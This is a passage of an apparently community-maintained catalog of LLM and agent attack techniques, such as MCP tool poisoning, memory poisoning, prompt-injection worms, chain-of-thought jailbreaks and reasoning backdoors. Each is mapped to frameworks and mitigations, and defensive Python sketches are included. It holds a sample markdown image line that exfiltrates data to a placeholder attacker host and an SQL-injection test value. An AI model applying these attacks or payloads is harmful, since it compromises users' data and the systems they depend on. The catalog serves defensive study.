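For the "output filter against system-prompt regurgitation" mitigation (LLM-ATTK-0602, LLM-ATTK-0610), one simple approach is word n-gram overlap between the system prompt and each response. The sketch below is an assumption-laden illustration: the 5-gram window, the 0.2 threshold, and the function names are arbitrary choices, and paraphrased or translated leaks would pass it.

```python
def _word_ngrams(text: str, n: int) -> set[tuple[str, ...]]:
    """Lower-cased word n-grams of a text."""
    words = text.lower().split()
    return {tuple(words[i : i + n]) for i in range(len(words) - n + 1)}


def leak_ratio(system_prompt: str, output: str, n: int = 5) -> float:
    """Fraction of the system prompt's n-grams that reappear verbatim in the output."""
    prompt_grams = _word_ngrams(system_prompt, n)
    if not prompt_grams:
        return 0.0
    return len(prompt_grams & _word_ngrams(output, n)) / len(prompt_grams)


def redact_if_leaking(system_prompt: str, output: str, threshold: float = 0.2) -> str:
    """Withhold a response that reproduces too much of the system prompt."""
    if leak_ratio(system_prompt, output) >= threshold:
        return "[response withheld: possible system-prompt disclosure]"
    return output
```

Because verbatim matching is easy to evade (for example by asking for the prompt in Base64), this kind of filter complements, and does not replace, the first mitigation in the table: never store secrets in prompts.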

Group 7 — System & Application Layer

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0701 | Insecure Output Handling | OWASP LLM05 | Downstream trusts/executes model output → XSS/SQLi/SSRF/RCE. | Treat output as untrusted; context-aware encoding; parameterised queries; CSP. | OWASP LLM05 |
| LLM-ATTK-0702 | Excessive Agency | OWASP LLM06; ASI01 | Over-broad permissions; injected model inherits them. | Least privilege; minimise tools/scopes; HITL. | OWASP LLM06 |
| LLM-ATTK-0703 | Insecure Plugin / Tool Design | OWASP LLM06; MCP | Vulnerable tool exploited via the model. | Tool AppSec; param validation; OAuth2 least-scope; signed manifests. | OWASP LLM06; MCP Top 10 |
| LLM-ATTK-0704 | Vector & Embedding Weaknesses | OWASP LLM08 | Weak ACL/inversion in RAG vector stores. | Permission-aware retrieval; ingest validation; query monitoring. | OWASP LLM08 |
| LLM-ATTK-0705 | Supply-Chain Vulnerabilities | OWASP LLM03; ASI04; ATLAS AML.T0010 | Compromised model/lib/format (pickle RCE). | SBOM/ML-BOM; safetensors; signing; pinning. | OWASP LLM03 |
| LLM-ATTK-0706 | Unexpected Code Execution (RCE via codegen) | OWASP ASI05; ATLAS AML.T0050 | Agent executes attacker-influenced generated code. | Separate gen from exec; micro-VM/WebAssembly sandbox; egress controls. | OWASP ASI05 |
| LLM-ATTK-0707 | Serialization-Boundary RCE (LangGrinch) | OWASP LLM05; OWASP ASI05 | Prompt-injected JSON carrying a framework deserialization marker (e.g. LangChain `{"lc":1}`) reconstructs unintended classes on parse, yielding RCE / secret exfiltration (CVE-2025-68664). | Patch frameworks; strict type validation at the parse boundary; never instantiate arbitrary classes from model output. | LangGrinch CVE-2025-68664 |
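
Two of the mitigations for Insecure Output Handling (LLM-ATTK-0701), context-aware encoding and parameterised queries, are easy to show side by side. The sketch below uses only the standard library; the `customers` table and both function names are hypothetical.

```python
import html
import sqlite3


def render_model_text(model_output: str) -> str:
    """Escape model output for an HTML body context before it reaches the browser."""
    return "<p>" + html.escape(model_output, quote=True) + "</p>"


def find_customer(conn: sqlite3.Connection, model_supplied_name: str) -> list[tuple]:
    """Look up a customer using a bound parameter, never string concatenation."""
    cursor = conn.execute(
        "SELECT id, name FROM customers WHERE name = ?",
        (model_supplied_name,),
    )
    return cursor.fetchall()
```

With these in place, a model-emitted `<script>` tag is displayed as text instead of executing, and a value such as `x' OR '1'='1` is compared as a literal name and matches nothing. Escaping is context-specific: HTML attributes, URLs, shell arguments, and SQL identifiers each need their own encoder or an allowlist.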

Group 8 — Agentic, Multi-Agent & MCP

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0801 | Agent Goal Hijacking | OWASP ASI01; ATLAS AML.T0051 | Attacker rewrites the agent's objective via injection/poisoned tool output. | Goal/plan integrity; constrained action space; HITL on goal changes. | OWASP ASI01 |
| LLM-ATTK-0802 | Memory & Context Poisoning (MINJA) | OWASP ASI06; ATLAS AML.T0020 | Time-delayed: malicious memory records fire later (MINJA >95% injection success). | Per-tenant memory segmentation; provenance + expiry; audits. | MINJA: arXiv 2503.03704 (NeurIPS 2025) |
| LLM-ATTK-0803 | Tool Poisoning (MCP) | OWASP MCP; ASI04 | Malicious instructions in a tool description/manifest the model reads. | Allowlist MCP servers; signed manifests; inspect descriptions; least privilege. | OWASP MCP Top 10 |
| LLM-ATTK-0804 | MCP Shadowing / Rug-Pull / Line-Jumping | OWASP MCP (MCP01:2025); ASI04 | Name-collision (shadowing) / post-approval mutation (rug-pull) / Line-Jumping: a malicious server's tool descriptions, returned via tools/list at capability negotiation, inject instructions into the model context before any tool is invoked, bypassing user-approval and even influencing calls to other trusted servers. | Pin + re-verify on change; namespace isolation; human re-approval on diff; scan tool descriptions on connect (cf. mcp-context-protector). | OWASP MCP Top 10; Trail of Bits "Jumping the Line" (2025-04-21); vulnerablemcp.info |
| LLM-ATTK-0805 | MCP Server SSRF / Credential Theft | OWASP MCP; ATLAS AML.T0049 | Vulnerable MCP server coerced into SSRF (cloud metadata). | Egress allowlist; block metadata endpoints; least-priv creds. | OWASP MCP Top 10 |
| LLM-ATTK-0806 | Inter-Agent Comms / Agent-in-the-Middle | OWASP ASI07 | One agent trusts a peer's output a human guardrail would block. | mTLS + signed A2A; zero-trust between agents; intent validation on peer input. | OWASP ASI07; arXiv 2507.06850 (agent-based system compromise) |
| LLM-ATTK-0807 | Self-Replicating Prompt-Injection Worm (Morris II) | OWASP ASI01/04; ATLAS AML.T0051 | Self-replicating prompt; each infected agent's output carries the payload onward. | Output sanitisation that breaks replication; provenance; HITL on outbound. | Morris II: arXiv 2403.02817 |
| LLM-ATTK-0808 | Cascading Failures | OWASP ASI08 | One agent fault propagates through high-fan-out automation. | Blast-radius caps; circuit breakers; kill switches; rate limits. | OWASP ASI08 |
| LLM-ATTK-0809 | Confused-Deputy Exfiltration via Rendering | OWASP LLM01/06; ATLAS AML.T0024 | Injection makes the model emit `![x](http://attacker/?d=secret)` that auto-fetches. | Disable/sanitise auto-render of model-emitted URLs/images; egress allowlist; strip query-encoded data. | OWASP LLM01; Embrace The Red |
| LLM-ATTK-0810 | MCP Sampling Abuse (Covert Tool Invocation) | MCP; OWASP ASI02; OWASP ASI05 | A malicious/compromised MCP server uses the sampling/createMessage reverse control-flow to make the client LLM perform unauthorized local actions, hiding the acknowledgment in normal output. | Human-in-the-loop approval for system-level tool calls; request-side scanning for hidden injection markers; least agency. | Unit 42: MCP attack vectors |
| LLM-ATTK-0811 | Cross-MCP Context / Memory Poisoning (Agent Goal Hijack) | OWASP ASI01; OWASP ASI06; OWASP ASI08 | One compromised component pollutes shared state / memory / config used by sibling agents, rewriting downstream agents' goals via natural-language-as-command. | Treat shared/persistent state as untrusted; cryptographic validation of cross-component data; human oversight on goal changes. | OWASP Agentic Top 10 (2026) |
| LLM-ATTK-0812 | Agentic Confused Deputy / Delegated Privilege Abuse | OWASP ASI03; OWASP LLM06 | An MCP/agent with broader OAuth scope than the user is induced (via indirect injection or token passthrough) to perform actions the user is not authorized to do. | User-context identity propagation; strict OAuth scope minimization; audience-bound tokens. | OWASP Agentic Top 10 (2026) |
| LLM-ATTK-0813 | Insecure Inter-Agent Communication / Rogue Agents | OWASP ASI07; OWASP ASI08; OWASP ASI10 | Spoofed or unauthenticated agent-to-agent messages misdirect agent clusters, causing cascading failures and rogue-agent behavior. | Mutual authentication + cryptographic attestation for A2A messaging; policy checks on handoffs. | OWASP Agentic Top 10 (2026) |
| LLM-ATTK-0814 | Prompt Infection (Self-Replicating Multi-Agent Worm) | OWASP ASI; OWASP LLM01 | An injected prompt instructs each agent to copy the payload into its outputs/messages, propagating across a multi-agent system like a worm. | Sanitize inter-agent content; provenance + rate controls; treat agent outputs as untrusted input. | Prompt Infection (arXiv:2410.07283) |
| LLM-ATTK-0815 | MCP Rug-Pull | MCP; OWASP ASI04 | A previously-approved MCP tool silently mutates its definition/behavior after initial trust, bypassing one-time review. | Pin + re-verify tool definitions on every load; signed tool manifests; alert on definition drift. | Invariant Labs: MCP tool poisoning |
| LLM-ATTK-0816 | MCP Tool Shadowing | MCP; OWASP ASI02 | A malicious MCP server overrides or intercepts a trusted tool of the same name, hijacking its calls. | Namespace + sign tools per server; disambiguate by server identity; deny shadowing of trusted names. | Invariant Labs: MCP tool poisoning |
| LLM-ATTK-0817 | Persistent Memory Poisoning (cross-session) | OWASP ASI06; OWASP LLM01; ATLAS Memory Manipulation | Indirect injection writes false facts into long-term memory (ChatGPT bio, Gemini Memory, Bedrock summarizer) that survive future sessions (SpAIware, MINJA >95% ASR). | Provenance-tagged memory; user confirmation on writes; sandboxed snapshots; trust scoring. | SpAIware (Embrace The Red) |
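
The "pin + re-verify tool definitions on every load" mitigation (LLM-ATTK-0804, LLM-ATTK-0815) amounts to fingerprinting each approved tool definition and comparing on every connect. The sketch below assumes each tool arrives as a dict with `name`, `description`, and `inputSchema` keys, as in an MCP `tools/list` result; the pin store is a plain dict and all function names are hypothetical.

```python
import hashlib
import json


def fingerprint(tool: dict) -> str:
    """Stable SHA-256 over the whole tool definition (name, description, schema)."""
    canonical = json.dumps(tool, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def check_tools(pins: dict[str, str], server: str, tools: list[dict]) -> dict[str, str]:
    """Classify each tool as 'ok', 'new', or 'changed' against pinned fingerprints."""
    status = {}
    for tool in tools:
        key = f"{server}/{tool['name']}"  # namespaced per server to resist shadowing
        pinned = pins.get(key)
        if pinned is None:
            status[key] = "new"
        elif pinned == fingerprint(tool):
            status[key] = "ok"
        else:
            status[key] = "changed"
    return status


def approve(pins: dict[str, str], server: str, tool: dict) -> None:
    """Record a human-approved tool definition."""
    pins[f"{server}/{tool['name']}"] = fingerprint(tool)
```

A client would refuse to expose any tool whose status is `new` or `changed` until a human re-approves the diff. Because line-jumping fires when descriptions enter the model context, the check has to run before the descriptions are shown to the model, not just before the first tool call.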

Group 9 — Availability & Resource

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0901 | Unbounded Consumption / Denial of Wallet | OWASP LLM10; ATLAS AML.T0029 | Resource-intensive queries inflate cost/degrade service. | Rate limits, quotas, timeouts; length/complexity caps; cost monitoring. | OWASP LLM10 |
| LLM-ATTK-0902 | Model Denial of Service | OWASP LLM10; ATLAS AML.T0029 | Overwhelm with resource-heavy ops. | Per-user/IP limits; input validation; autoscaling. | OWASP LLM10 |
| LLM-ATTK-0903 | Sponge Examples (energy-latency) | OWASP LLM10; ATLAS AML.T0029 | Inputs crafted to maximise compute/latency per query. | Latency/compute caps; per-query cost anomaly detection. | Sponge Examples: arXiv 2006.03463 |
| LLM-ATTK-0904 | P-DoS (Poisoning-Induced Denial of Service) | OWASP LLM10; ATLAS AML.T0029 | Fine-tune-time poisoning makes the model emit endless output on a trigger. | Max-token enforcement; output-length anomaly detection; trigger sweeps. | P-DoS (arXiv:2410.10760) |
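
The per-user quota mitigations in this group can be sketched as a token bucket that budgets model tokens instead of requests. This is a minimal in-memory illustration; the class name, capacity, and refill rate are assumptions, and a real deployment would keep the state in a shared store.

```python
import time
from typing import Callable


class TokenBudget:
    """Per-user token bucket measured in model tokens (prompt plus max output)."""

    def __init__(self, capacity: float, refill_per_second: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.capacity = float(capacity)
        self.refill_per_second = float(refill_per_second)
        self.clock = clock
        self._state: dict[str, tuple[float, float]] = {}  # user -> (available, last_seen)

    def try_spend(self, user: str, tokens: float) -> bool:
        """Deduct tokens if the user's budget allows it; otherwise refuse."""
        now = self.clock()
        available, last_seen = self._state.get(user, (self.capacity, now))
        elapsed = now - last_seen
        available = min(self.capacity, available + elapsed * self.refill_per_second)
        if tokens > available:
            self._state[user] = (available, now)
            return False
        self._state[user] = (available - tokens, now)
        return True
```

Charging the requested maximum output length up front, before generation starts, also bounds the damage from the P-DoS row above: a triggered model cannot emit more tokens than the caller was able to reserve.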

Group 10 — Trust & Reliability

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-1001 | Misinformation / Hallucination | OWASP LLM09; ATLAS AML.T0048 | Plausible fabricated output (fake cases, slopsquatting). | RAG grounding; cross-verification; HITL; uncertainty signalling. | OWASP LLM09 |
| LLM-ATTK-1002 | Overreliance | OWASP LLM09 | Users over-trust output and skip oversight. | HITL on critical decisions; AI-content labelling; verification UX. | OWASP LLM09 |
| LLM-ATTK-1003 | Human-Agent Trust Exploitation | OWASP ASI09; OWASP LLM09 | Polished, confident agent explanations induce humans to approve harmful tool calls. | Surface uncertainty explicitly; second-model critique; human-in-loop only for high-blast-radius actions. | OWASP Agentic Top 10 (2026) |
| LLM-ATTK-1004 | Cascading Failures in Agent Pipelines | OWASP ASI08 | An error or compromise in one agent propagates and compounds across a multi-step agent chain. | Per-step verifier; bounded confidence compounding; circuit breakers between agents. | OWASP Agentic Top 10 (2026) |
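
For LLM-ATTK-1004, the per-step verifier and circuit-breaker mitigations can be combined in a small wrapper placed between agents. The following is a sketch only: `AgentCircuitBreaker`, `CircuitOpenError`, and the `step`/`verifier` callables are hypothetical names, and the failure threshold is an arbitrary assumption.

```python
class CircuitOpenError(RuntimeError):
    """Raised when the breaker has tripped and downstream steps are blocked."""


class AgentCircuitBreaker:
    """Hypothetical guard that sits between two agents in a pipeline."""

    def __init__(self, max_consecutive_failures=3):
        self.max_consecutive_failures = max_consecutive_failures
        self.consecutive_failures = 0
        self.is_open = False

    def run_step(self, step, verifier, payload):
        """Run one agent step; forward its output only if the verifier accepts it."""
        if self.is_open:
            raise CircuitOpenError("pipeline halted; manual reset required")
        result = step(payload)
        if verifier(result):
            self.consecutive_failures = 0
            return result
        self.consecutive_failures += 1
        if self.consecutive_failures >= self.max_consecutive_failures:
            self.is_open = True  # stop the chain before errors compound further
        return None  # a rejected output is never passed downstream
```

The key design choice is that a rejected result is dropped rather than forwarded, so one agent's bad output cannot become the next agent's trusted input.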

Group 11 — Reasoning-Model / Chain-of-Thought-Specific

New surface for large reasoning models (o1/o3, DeepSeek-R1, Gemini Thinking, Claude extended thinking): attacks that exploit the exposed or extended intermediate reasoning trace itself, whether as a jailbreak vector, a resource sink, or a backdoor target. These are distinct from the output-targeting jailbreaks in Group 2.

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-1101 | H-CoT (Hijacking the CoT Safety Reasoning) | OWASP LLM01-adj; ATLAS AML.T0054 | Feeds the LRM fabricated copies of its own displayed intermediate safety reasoning to hijack the safety-reasoning step; drops o1 refusal 98%→<2% (also o3/DeepSeek-R1/Gemini 2.0 Flash Thinking). | Don't expose raw safety reasoning; reasoning-trace integrity checks; intent classification independent of model's own CoT. | H-CoT: arXiv 2502.12893 (Feb 2025) |
| LLM-ATTK-1102 | Chain-of-Thought Hijacking (refusal dilution) | OWASP LLM01-adj; ATLAS AML.T0054 | Prepends long benign reasoning (e.g. puzzles) before the harmful ask + a final-answer cue; shifts attention off harmful tokens, weakening the low-dim refusal signal. ASR 94–100% (Gemini 2.5 Pro / o4-mini / Grok 3 Mini / Claude 4 Sonnet). Inverts "more reasoning = safer". | Attention/length-robust safety; cumulative-intent scoring over the whole prompt; cap benign-prefix dilution. | CoT Hijacking: arXiv 2510.26418 (Oct 2025, w/ Anthropic); cf. HauntAttack 2506.07031 |
| LLM-ATTK-1103 | OverThink (reasoning-token denial-of-wallet) | OWASP LLM10; ATLAS AML.T0029 | Indirect-injects benign decoy reasoning problems (Sudoku/MDP) into retrievable/RAG content to force 18–46× extra hidden CoT tokens while still returning a correct visible answer; reasoning + answer tokens are both billed (~4× output cost). | Reasoning-token budget caps; per-query cost anomaly detection; sanitise retrieved content for injected puzzles. | OverThink: arXiv 2502.02542 (Feb 2025); cf. ExtendAttack 2506.13737 |
| LLM-ATTK-1104 | BadThink (training-time overthinking backdoor) | OWASP LLM04; ATLAS AML.T0018 | Poisoning-based fine-tune: a trigger inflates reasoning-trace length >17× (MATH-500) while keeping the final answer correct, a covert cost/perf degradation that output-accuracy evals miss. (Not the first such backdoor; that primacy claim was refuted.) | Trace-length anomaly monitoring; provenance on fine-tuned weights; post-tune behavioural evals. | BadThink: arXiv 2511.10714 (AAAI 2026); cf. BadReasoner 2507.18305 |
| LLM-ATTK-1105 | ShadowCoT (internal-reasoning-path backdoor) | OWASP LLM04; ATLAS AML.T0018 | Parameter-efficient fine-tune conditions on internal reasoning states, rewires attention pathways and perturbs intermediate reps to disrupt key reasoning steps (94.4% ASR, 88.4% hijack, 0.15% params). Distinct from generic Backdoor/Sleeper. | Interpretability probes on reasoning paths; treat 3rd-party weights as untrusted; provenance. | ShadowCoT: arXiv 2504.05605 (Apr 2025) |
| LLM-ATTK-1106 | BadChain (demonstration-CoT backdoor) | OWASP LLM01; ATLAS AML.T0051 | No training/parameter access: inserts a malicious backdoor reasoning step into the few-shot demonstration CoT so a trigger phrase in the query alters the final answer. More effective on stronger reasoners (97% ASR GPT-4). | Inspect/normalise few-shot demonstrations; trigger-phrase anomaly detection; demonstration provenance. | BadChain: arXiv 2401.12242 (ICLR 2024) |
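
The trace-length anomaly monitoring suggested for LLM-ATTK-1103 and LLM-ATTK-1104 can be approximated with a robust outlier test over reasoning-token counts. The sketch below uses median and median absolute deviation (MAD); the function name, the threshold of 6.0, and the sample baseline are assumptions for illustration, not values taken from the cited papers.

```python
from statistics import median


def trace_length_is_anomalous(baseline_lengths, observed_length, threshold=6.0):
    """Flag a reasoning trace far longer than the baseline for comparable queries.

    baseline_lengths: reasoning-token counts from known-good traffic (assumed input).
    threshold: how many MADs above the median counts as anomalous (assumed value).
    """
    if len(baseline_lengths) < 3:
        raise ValueError("need at least three baseline samples")
    center = median(baseline_lengths)
    mad = median([abs(length - center) for length in baseline_lengths])
    scale = max(mad, 1.0)  # avoid dividing by zero when the baseline is constant
    return (observed_length - center) / scale > threshold


# Example: typical traces use about 1000 reasoning tokens.
baseline = [900, 1000, 1100, 950, 1050]
normal = trace_length_is_anomalous(baseline, 1200)     # 4 MADs above the median
inflated = trace_length_is_anomalous(baseline, 17000)  # roughly 17x the median
```

Only one-sided deviations are flagged, since both attacks inflate the trace; this check complements, and does not replace, a hard reasoning-token budget cap.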

Contributing

New techniques, better framework mappings, fresh references, and corrections are all welcome. Keep entries vendor-neutral and citation-backed. See contributing.md.

License & Attribution

Licensed under CC-BY-4.0 — you may share and adapt this catalog for any purpose, including commercial and private products, as long as you give appropriate credit.

When you reuse this material, please credit it like this:

"Awesome LLM Attacks" by Martin Holovsky, licensed under CC BY 4.0. https://github.com/martinholovsky/awesome-llm-attacks

BibTeX:

@misc{holovsky_awesome_llm_attacks,
  author       = {Martin Holovsky},
  title        = {Awesome LLM Attacks: A Framework-Mapped Catalog of LLM \& GenAI Attack Techniques},
  howpublished = {\url{https://github.com/martinholovsky/awesome-llm-attacks}},
  note         = {Licensed under CC BY 4.0}
}
